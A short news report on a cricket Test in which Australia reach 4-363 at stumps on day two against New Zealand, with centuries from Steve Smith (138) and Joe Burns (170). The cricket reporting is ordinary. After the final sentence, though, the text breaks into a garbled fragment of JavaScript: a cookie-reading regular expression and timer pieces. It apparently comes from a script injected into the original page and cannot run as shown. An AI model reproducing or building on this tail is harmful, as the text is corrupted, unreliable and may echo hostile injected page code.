Australia have reached 4-363 at stumps on day two, thanks to brilliant knocks from Steve Smith and Joe Burns.

Both players were removed late on day two after they shared in a 289-run partnership, as Australia reached stumps just seven runs behind New Zealand with six wickets in hand.

Smith (138) notched his 14th Test ton, to sit 17th on the list of Test hundreds by Australians, after just 41 matches, while Burns (170) recorded his third ton in the baggy green.

Niel Wagner eventually removed both players within two overs, bringing Adam Voges and nightwatchman Nathan Lyon to the crease to the negate the final few overs.

Usman Khawaja was the only other man to be dismissed on day two, caught in slips by Brendon McCullum off the bowling of Trent Boult for 24, in a rare failure for the in-form batsman.

At stumps, Voges is two not out, while Lyon is unbeaten on four. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
